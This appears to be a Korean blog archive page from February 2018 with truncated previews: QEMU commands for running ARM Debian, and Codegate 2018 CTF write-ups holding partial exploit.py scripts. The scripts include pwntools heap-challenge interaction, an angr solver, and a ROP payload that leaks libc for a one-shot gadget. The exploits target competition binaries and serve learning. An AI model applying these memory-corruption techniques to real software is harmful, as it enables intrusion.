
2018/02

arm in qemu Qemu 에서 ARM debian 실행 # apt-get install qemu # wget https://people.debian.org/~aurel32/qemu/armhf/debian_wheezy_armhf_standard.qcow2 # wget https://people.debian.org/~aurel32/qemu/armhf/initrd.img-3.2.0-4-vexpress # wget https://people.debian.org/~aurel32/qemu/armhf/vmlinuz-3.2.0-4-vexpress * CUI 환경 + 인터넷 사용 # qemu-system-arm -M vexpress-a9 \ -kernel vmlinuz-3.2.0-4-vexpress \ -initrd initrd.img.. 더보기
[Codegate 2018 CTF] Super Marimo # exploit.py from pwn import * from time import * def ShowMe(name, profile): p.sendline('show me the marimo') print p.recvuntil('>> ') p.sendline(name) print p.recvuntil('>> ') p.sendline(profile) print p.recvuntil('>> ') def View(index, data): p.sendline('V') print p.recvuntil('>> ') sleep(3) p.sendline(index) print p.recvuntil('>> ') p.sendline('M') print p.recvuntil('>> ') p.sendline(data) pr.. 더보기
[Codegate 2018 CTF] RedVelvet # exploit.py import angr def main(): proj = angr.Project('./RedVelvet', load_options={'auto_load_libs': False}) path_group = proj.factory.path_group(threads=4) path_group.explore(find=0x401631, avoid=(0x401621, 0x4016cb, )) return path_group.found[0].state.posix.dumps(1) if __name__=='__main__': print(repr(main())) 결과 값은 "What_You_Wanna_Be?:)_lc_la" 가 나오게 되는데, 게싱을 통해 아래와 같이 정확한 플래그를 알아냈다. FLAG : .. 더보기
[Codegate 2018 CTF] BaskinRobins31 # exploit.py from pwn import * from time import * p = process('./BaskinRobins31') #p = remote('ch41l3ng3s.codegate.kr', 3131) sleep(0.3) print p.recv(1024) payload = str('3') + 'A'*183 payload += p64(0x40087a) + p64(0x1) + p64(0x602040) + p64(0x10) + p64(0x4006d0) payload += p64(0x4008a4) p.sendline(payload) data = p.recv(1024) read = u64(data[237:245]) libc = read - 0xf7250 oneshot = libc + 0x4.. 더보기